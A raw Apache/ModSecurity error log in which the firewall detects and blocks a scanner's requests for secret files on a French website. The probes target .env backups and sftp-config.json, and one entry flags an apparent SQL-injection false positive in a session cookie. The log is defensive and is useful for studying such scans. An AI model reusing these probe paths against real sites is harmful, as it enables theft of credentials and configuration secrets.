[Mon May 11 11:25:20.614922 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:23254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgf2S6k_SCYd1AVZqmlgAAAQk"]
[Mon May 11 11:25:21.646574 2026] [security2:error] [pid 1256241:tid 1256268] [client 123.160.223.72:44278] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: beb5f3035cebd4069478ebe804982905||1778493319||1778492959"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/uploads/2017/03/logo-icon-2.png"] [unique_id "agGggZkIEwRJMyDaV55FuAAAAVY"]
[Mon May 11 11:25:21.646778 2026] [security2:error] [pid 1256241:tid 1256268] [client 123.160.223.72:44278] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/uploads/2017/03/logo-icon-2.png"] [unique_id "agGggZkIEwRJMyDaV55FuAAAAVY"]
[Mon May 11 11:25:21.648932 2026] [security2:error] [pid 1256241:tid 1256268] [client 123.160.223.72:44278] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/uploads/2017/03/logo-icon-2.png"] [unique_id "agGggZkIEwRJMyDaV55FuAAAAVY"]
[Mon May 11 11:25:34.667869 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:33254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /packages/.env.tmp2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/packages/.env.tmp2"] [unique_id "agGgjkRdw2n9wv6Ai4__dwAAAJM"]
[Mon May 11 11:25:34.668477 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:33254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/packages/.env.tmp2"] [unique_id "agGgjkRdw2n9wv6Ai4__dwAAAJM"]
[Mon May 11 11:25:35.837865 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:33254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgjkRdw2n9wv6Ai4__dwAAAJM"]
[Mon May 11 11:25:35.865279 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:33262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /packages/.env.tmp2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/packages/.env.tmp2"] [unique_id "agGgj2S6k_SCYd1AVZqmpAAAARU"]
[Mon May 11 11:25:35.865701 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:33262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/packages/.env.tmp2"] [unique_id "agGgj2S6k_SCYd1AVZqmpAAAARU"]
[Mon May 11 11:25:37.122227 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:33262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgj2S6k_SCYd1AVZqmpAAAARU"]
[Mon May 11 11:25:48.393757 2026] [autoindex:error] [pid 1254212:tid 1254237] [client 123.160.223.73:44902] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 11:25:51.459474 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:46316] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env.copy.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/panel/.env.copy.bak"] [unique_id "agGgn2S6k_SCYd1AVZqmtwAAARQ"]
[Mon May 11 11:25:51.459642 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:46316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/panel/.env.copy.bak"] [unique_id "agGgn2S6k_SCYd1AVZqmtwAAARQ"]
[Mon May 11 11:25:52.629087 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:46316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgn2S6k_SCYd1AVZqmtwAAARQ"]
[Mon May 11 11:25:52.653112 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:46326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env.copy.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/panel/.env.copy.bak"] [unique_id "agGgoBjZymfuKpjWXehz7gAAAMc"]
[Mon May 11 11:25:52.653346 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:46326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/panel/.env.copy.bak"] [unique_id "agGgoBjZymfuKpjWXehz7gAAAMc"]
[Mon May 11 11:25:53.935142 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:46326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgoBjZymfuKpjWXehz7gAAAMc"]
[Mon May 11 11:26:08.827137 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:63212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /payment/.env.testing.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/payment/.env.testing.dist"] [unique_id "agGgsERdw2n9wv6Ai4__kwAAAIg"]
[Mon May 11 11:26:08.827604 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:63212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/payment/.env.testing.dist"] [unique_id "agGgsERdw2n9wv6Ai4__kwAAAIg"]
[Mon May 11 11:26:09.983965 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:63212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgsERdw2n9wv6Ai4__kwAAAIg"]
[Mon May 11 11:26:10.010848 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:63220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /payment/.env.testing.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/payment/.env.testing.dist"] [unique_id "agGgshjZymfuKpjWXehz9wAAAMY"]
[Mon May 11 11:26:10.011352 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:63220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/payment/.env.testing.dist"] [unique_id "agGgshjZymfuKpjWXehz9wAAAMY"]
[Mon May 11 11:26:11.246545 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:63220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgshjZymfuKpjWXehz9wAAAMY"]
[Mon May 11 11:26:13.757226 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:37430] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /php/.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/php/.env.production.backup"] [unique_id "agGgtURdw2n9wv6Ai4__lgAAAIM"]
[Mon May 11 11:26:13.757632 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:37430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/php/.env.production.backup"] [unique_id "agGgtURdw2n9wv6Ai4__lgAAAIM"]
[Mon May 11 11:26:14.730207 2026] [:error] [pid 1254242:tid 1254267] [client 40.77.167.29:36614] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:26:14.930182 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:37430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgtURdw2n9wv6Ai4__lgAAAIM"]
[Mon May 11 11:26:14.953362 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:37436] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /php/.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/php/.env.production.backup"] [unique_id "agGgthjZymfuKpjWXehz-gAAAMA"]
[Mon May 11 11:26:14.953709 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:37436] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/php/.env.production.backup"] [unique_id "agGgthjZymfuKpjWXehz-gAAAMA"]
[Mon May 11 11:26:16.191278 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:37436] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgthjZymfuKpjWXehz-gAAAMA"]
[Mon May 11 11:26:29.604542 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:9392] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /php/sftp-config.json.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/php/sftp-config.json.tmp"] [unique_id "agGgxRjZymfuKpjWXeh0DAAAAMQ"]
[Mon May 11 11:26:29.605835 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:9392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/php/sftp-config.json.tmp"] [unique_id "agGgxRjZymfuKpjWXeh0DAAAAMQ"]
[Mon May 11 11:26:30.857611 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:9392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgxRjZymfuKpjWXeh0DAAAAMQ"]
[Mon May 11 11:26:30.883935 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:9400] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /php/sftp-config.json.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/php/sftp-config.json.tmp"] [unique_id "agGgxpkIEwRJMyDaV55F_wAAAUM"]
[Mon May 11 11:26:30.884854 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:9400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/php/sftp-config.json.tmp"] [unique_id "agGgxpkIEwRJMyDaV55F_wAAAUM"]
[Mon May 11 11:26:32.122306 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:9400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgxpkIEwRJMyDaV55F_wAAAUM"]
[Mon May 11 11:26:32.138504 2026] [security2:error] [pid 1254212:tid 1254227] [client 185.177.72.9:9402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /play/.env.old_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/play/.env.old_old"] [unique_id "agGgyEYQeUtAPynIs6xQjgAAAA0"]
[Mon May 11 11:26:32.138717 2026] [security2:error] [pid 1254212:tid 1254227] [client 185.177.72.9:9402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/play/.env.old_old"] [unique_id "agGgyEYQeUtAPynIs6xQjgAAAA0"]
[Mon May 11 11:26:33.303212 2026] [security2:error] [pid 1254212:tid 1254227] [client 185.177.72.9:9402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgyEYQeUtAPynIs6xQjgAAAA0"]
[Mon May 11 11:26:33.329597 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:43212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /play/.env.old_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/play/.env.old_old"] [unique_id "agGgyURdw2n9wv6Ai4__qwAAAIg"]
